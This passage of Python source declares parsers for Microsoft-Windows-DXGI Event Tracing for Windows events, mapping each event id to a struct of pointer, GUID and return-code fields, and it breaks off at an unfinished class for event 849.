@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=64, version=0)
class Microsoft_Windows_DXGI_64_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Enabled" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=65, version=0)
class Microsoft_Windows_DXGI_65_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Enabled" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=66, version=0)
class Microsoft_Windows_DXGI_66_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Enabled" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=67, version=0)
class Microsoft_Windows_DXGI_67_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=68, version=0)
class Microsoft_Windows_DXGI_68_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"Format" / Int32ul,
"ColorSpace" / Int32ul,
"OutputFlags" / Int32ul,
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=69, version=0)
class Microsoft_Windows_DXGI_69_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"ColorSpace" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=70, version=0)
class Microsoft_Windows_DXGI_70_0(Etw):
pattern = Struct(
"Index" / Int32ul,
"Code" / Int32ul,
"ThreadId" / Int32ul,
"Message" / CString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=71, version=0)
class Microsoft_Windows_DXGI_71_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"BackbufferCount" / Int8ul,
"BackbufferHandles" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=72, version=0)
class Microsoft_Windows_DXGI_72_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"KeepExistingContent" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=73, version=0)
class Microsoft_Windows_DXGI_73_0(Etw):
pattern = Struct(
"pIDXGIFactory" / Int64ul,
"ReparentingOccurred" / Int8ul,
"DecidingFactor" / Int32ul,
"Message" / CString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=74, version=0)
class Microsoft_Windows_DXGI_74_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"m_pPreferredOutput" / Int64ul,
"NewSyncInterval" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=80, version=0)
class Microsoft_Windows_DXGI_80_0(Etw):
pattern = Struct(
"riid" / Guid,
"ppFactory" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=81, version=0)
class Microsoft_Windows_DXGI_81_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=104, version=0)
class Microsoft_Windows_DXGI_104_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=105, version=0)
class Microsoft_Windows_DXGI_105_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=106, version=0)
class Microsoft_Windows_DXGI_106_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=107, version=0)
class Microsoft_Windows_DXGI_107_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=108, version=0)
class Microsoft_Windows_DXGI_108_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=109, version=0)
class Microsoft_Windows_DXGI_109_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=110, version=0)
class Microsoft_Windows_DXGI_110_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"uiDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=111, version=0)
class Microsoft_Windows_DXGI_111_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=112, version=0)
class Microsoft_Windows_DXGI_112_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=113, version=0)
class Microsoft_Windows_DXGI_113_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=114, version=0)
class Microsoft_Windows_DXGI_114_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=115, version=0)
class Microsoft_Windows_DXGI_115_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=116, version=0)
class Microsoft_Windows_DXGI_116_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=117, version=0)
class Microsoft_Windows_DXGI_117_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=118, version=0)
class Microsoft_Windows_DXGI_118_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"iOutput" / Int32ul,
"ppOutput" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=119, version=0)
class Microsoft_Windows_DXGI_119_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=120, version=0)
class Microsoft_Windows_DXGI_120_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=121, version=0)
class Microsoft_Windows_DXGI_121_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=122, version=0)
class Microsoft_Windows_DXGI_122_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pUMDVersion" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=123, version=0)
class Microsoft_Windows_DXGI_123_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=124, version=0)
class Microsoft_Windows_DXGI_124_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=125, version=0)
class Microsoft_Windows_DXGI_125_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=126, version=0)
class Microsoft_Windows_DXGI_126_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=127, version=0)
class Microsoft_Windows_DXGI_127_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=128, version=0)
class Microsoft_Windows_DXGI_128_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=129, version=0)
class Microsoft_Windows_DXGI_129_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=130, version=0)
class Microsoft_Windows_DXGI_130_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"uiDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=131, version=0)
class Microsoft_Windows_DXGI_131_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=132, version=0)
class Microsoft_Windows_DXGI_132_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=133, version=0)
class Microsoft_Windows_DXGI_133_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=134, version=0)
class Microsoft_Windows_DXGI_134_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=135, version=0)
class Microsoft_Windows_DXGI_135_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=136, version=0)
class Microsoft_Windows_DXGI_136_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=137, version=0)
class Microsoft_Windows_DXGI_137_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=138, version=0)
class Microsoft_Windows_DXGI_138_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=139, version=0)
class Microsoft_Windows_DXGI_139_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=140, version=0)
class Microsoft_Windows_DXGI_140_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"EnumFormat" / Int32ul,
"dwFlags" / Int32ul,
"pNumModes" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=141, version=0)
class Microsoft_Windows_DXGI_141_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=142, version=0)
class Microsoft_Windows_DXGI_142_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pConcernedDevice" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=143, version=0)
class Microsoft_Windows_DXGI_143_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=144, version=0)
class Microsoft_Windows_DXGI_144_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=145, version=0)
class Microsoft_Windows_DXGI_145_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=146, version=0)
class Microsoft_Windows_DXGI_146_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDevice" / Int64ul,
"bExclusive" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=147, version=0)
class Microsoft_Windows_DXGI_147_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=148, version=0)
class Microsoft_Windows_DXGI_148_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=150, version=0)
class Microsoft_Windows_DXGI_150_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pGammaCaps" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=151, version=0)
class Microsoft_Windows_DXGI_151_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=152, version=0)
class Microsoft_Windows_DXGI_152_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=153, version=0)
class Microsoft_Windows_DXGI_153_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=154, version=0)
class Microsoft_Windows_DXGI_154_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=155, version=0)
class Microsoft_Windows_DXGI_155_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=156, version=0)
class Microsoft_Windows_DXGI_156_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pScanoutSurface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=157, version=0)
class Microsoft_Windows_DXGI_157_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=158, version=0)
class Microsoft_Windows_DXGI_158_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pScanoutSurface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=159, version=0)
class Microsoft_Windows_DXGI_159_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=160, version=0)
class Microsoft_Windows_DXGI_160_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=161, version=0)
class Microsoft_Windows_DXGI_161_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=162, version=0)
class Microsoft_Windows_DXGI_162_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=163, version=0)
class Microsoft_Windows_DXGI_163_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=164, version=0)
class Microsoft_Windows_DXGI_164_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=165, version=0)
class Microsoft_Windows_DXGI_165_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=166, version=0)
class Microsoft_Windows_DXGI_166_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=167, version=0)
class Microsoft_Windows_DXGI_167_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=168, version=0)
class Microsoft_Windows_DXGI_168_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"uiDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=169, version=0)
class Microsoft_Windows_DXGI_169_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=170, version=0)
class Microsoft_Windows_DXGI_170_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=171, version=0)
class Microsoft_Windows_DXGI_171_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=172, version=0)
class Microsoft_Windows_DXGI_172_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=173, version=0)
class Microsoft_Windows_DXGI_173_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=174, version=0)
class Microsoft_Windows_DXGI_174_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=175, version=0)
class Microsoft_Windows_DXGI_175_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=176, version=0)
class Microsoft_Windows_DXGI_176_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=177, version=0)
class Microsoft_Windows_DXGI_177_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=178, version=0)
class Microsoft_Windows_DXGI_178_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"SyncInterval" / Int32ul,
"dwFlags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=179, version=0)
class Microsoft_Windows_DXGI_179_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=180, version=0)
class Microsoft_Windows_DXGI_180_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"iBuffer" / Int32ul,
"Interface" / Guid,
"ppSurface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=181, version=0)
class Microsoft_Windows_DXGI_181_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=182, version=0)
class Microsoft_Windows_DXGI_182_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"bFullscreen" / Int32ul,
"pTarget" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=183, version=0)
class Microsoft_Windows_DXGI_183_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=184, version=0)
class Microsoft_Windows_DXGI_184_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pbFullscreen" / Int32ul,
"ppTarget" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=185, version=0)
class Microsoft_Windows_DXGI_185_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=186, version=0)
class Microsoft_Windows_DXGI_186_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=187, version=0)
class Microsoft_Windows_DXGI_187_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=188, version=0)
class Microsoft_Windows_DXGI_188_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"BufferCount" / Int32ul,
"Width" / Int32ul,
"Height" / Int32ul,
"NewFormat" / Int32ul,
"SwapChainFalgs" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=189, version=0)
class Microsoft_Windows_DXGI_189_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=190, version=0)
class Microsoft_Windows_DXGI_190_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=191, version=0)
class Microsoft_Windows_DXGI_191_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=192, version=0)
class Microsoft_Windows_DXGI_192_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"ppOutput" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=193, version=0)
class Microsoft_Windows_DXGI_193_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=194, version=0)
class Microsoft_Windows_DXGI_194_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=195, version=0)
class Microsoft_Windows_DXGI_195_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=196, version=0)
class Microsoft_Windows_DXGI_196_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pLastPresentCount" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=197, version=0)
class Microsoft_Windows_DXGI_197_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=198, version=0)
class Microsoft_Windows_DXGI_198_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=199, version=0)
class Microsoft_Windows_DXGI_199_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=200, version=0)
class Microsoft_Windows_DXGI_200_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=201, version=0)
class Microsoft_Windows_DXGI_201_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=202, version=0)
class Microsoft_Windows_DXGI_202_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=203, version=0)
class Microsoft_Windows_DXGI_203_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=204, version=0)
class Microsoft_Windows_DXGI_204_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"uiDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=205, version=0)
class Microsoft_Windows_DXGI_205_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=206, version=0)
class Microsoft_Windows_DXGI_206_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=207, version=0)
class Microsoft_Windows_DXGI_207_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=208, version=0)
class Microsoft_Windows_DXGI_208_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=209, version=0)
class Microsoft_Windows_DXGI_209_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"pDataSize" / Int32ul,
"pData" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=210, version=0)
class Microsoft_Windows_DXGI_210_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"riid" / Guid,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=211, version=0)
class Microsoft_Windows_DXGI_211_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul,
"ppvObject" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=212, version=0)
class Microsoft_Windows_DXGI_212_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"iAdapter" / Int32ul,
"ppAdapterInterface" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=213, version=0)
class Microsoft_Windows_DXGI_213_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=214, version=0)
class Microsoft_Windows_DXGI_214_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"hWnd" / Int64ul,
"Flags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=215, version=0)
class Microsoft_Windows_DXGI_215_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=216, version=0)
class Microsoft_Windows_DXGI_216_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"phWnd" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=217, version=0)
class Microsoft_Windows_DXGI_217_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=218, version=0)
class Microsoft_Windows_DXGI_218_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pDevice" / Int64ul,
"ppSwapChain" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=219, version=0)
class Microsoft_Windows_DXGI_219_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=220, version=0)
class Microsoft_Windows_DXGI_220_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"hModule" / Int64ul,
"ppAdapter" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=221, version=0)
class Microsoft_Windows_DXGI_221_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=848, version=0)
class Microsoft_Windows_DXGI_848_0(Etw):
pattern = Struct(
"riid" / Guid,
"ppFactory" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=849, version=0)
class Microsoft_Windows_DXGI_849_0(Etw):
